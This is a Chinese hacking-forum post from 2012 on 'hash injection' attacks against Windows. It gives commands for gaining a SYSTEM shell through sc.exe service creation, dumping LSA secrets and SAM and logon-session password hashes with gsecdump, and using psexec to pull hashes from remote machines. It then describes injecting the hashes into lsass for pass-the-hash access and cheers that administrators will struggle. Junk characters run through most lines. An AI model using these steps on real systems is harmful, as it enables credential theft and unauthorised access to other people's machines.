找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2072|回复: 0
打印 上一主题 下一主题

HASH注入式攻击

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-6 21:09:29 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
o get a DOS Prompt as NT system:- v4 N4 T5 g4 |$ ~/ Y; A
+ f2 V. E% P: C; t
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact1 H4 ~( `, Z4 o. K( ?
[SC] CreateService SUCCESS
# [% A2 Z! I' T' a: v* @: S; p  n0 [. [. D. {& u
C:\>sc start shellcmdline
% H9 J1 ~+ ^) C8 @( H[SC] StartService FAILED 1053:
2 N  v$ Y( {5 P% N4 e% k1 V5 d$ W0 y
The service did not respond to the start or control request in a timely fashion.
3 e0 Z5 x# `2 Q8 S1 C+ v5 Z& J! B8 v* i
C:\>sc delete shellcmdline# F4 ~! e# N* F; B  K$ x& ]- d3 Y
[SC] DeleteService SUCCESS
' C8 Y6 i5 X  w: H4 z( K
: M* M* _% z/ D' Z% [0 ^. R------------8 y) \/ D5 K7 D; b
* A( e2 F# O8 [& r
Then in the new DOS window:
, N- n# w0 T" ~) F2 X1 I* `$ A' V+ ~; @) b
Microsoft Windows XP [Version 5.1.2600]
, G  j5 c3 S9 t: y(C) Copyright 1985-2001 Microsoft Corp.4 @, ^$ i9 H0 R" V: r+ x9 z
" A7 g1 z2 V6 L. Z! a; z
C:\WINDOWS\system32>whoami
; L( T. V% Q' R& [  c3 HNT AUTHORITY\SYSTEM
6 S8 J' e/ J6 x& T4 \' Z7 V
' D8 ?5 V3 [. E5 _C:\WINDOWS\system32>gsecdump -h
% l" Y  U, w% L9 @5 A6 Q1 ngsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)! f" r) X2 |9 P' X- q1 C
usage: gsecdump [options]3 P  M2 G! Z. z
' g8 y- q3 i" M; P/ H
options:
5 \6 {" E0 ~2 A-h [ --help ] show help
" N  K3 t; Y& o. L3 [' j7 N-a [ --dump_all ] dump all secrets8 z; ]1 R! w: @# i4 V* c% h
-l [ --dump_lsa ] dump lsa secrets
) ^3 ^8 X) w6 G; t" `& i-w [ --dump_wireless ] dump microsoft wireless connections0 T- `/ d3 U# W$ G6 y5 i
-u [ --dump_usedhashes ] dump hashes from active logon sessions
0 p3 B; l7 g' M-s [ --dump_hashes ] dump hashes from SAM/AD
6 B  l: |# Y  C8 ^5 b) `9 |6 p* I4 S8 E
Although I like to use:/ R# K' u# ?0 J; _
7 [6 m& A  O. I( N
PsExec v1.83 - Execute processes remotely
1 t! x. s" }5 O6 K' h; R4 K6 T$ F6 ^Copyright (C) 2001-2007 Mark Russinovich3 z: X5 m( E4 z$ g9 e& b5 u
Sysinternals - 链接标记[url]www.sysinternals.com[/url]
7 ~7 T, I# X4 l; c
; U# A& E: c* H6 tC:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
" m- p7 d) L3 |' `3 v% a, @8 r9 ^* b" n( ?# O4 y: w
to get the hashes from active logon sessions of a remote system." J7 T) w! B) B! t1 z' @) K

- r, V5 j" v+ j! S8 EThese are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.9 Q& L5 @& Y1 a; P. Y; ?6 L

/ u: j5 V# E, m- u0 }) i3 N提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.% x2 z" ~1 p) z& i7 D" J
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url], t# V& t# t" K

& Z4 M5 B& l9 s! a/ W! o1 [; D我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。9 r# i$ [/ }' v: L  b  U8 B) |
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表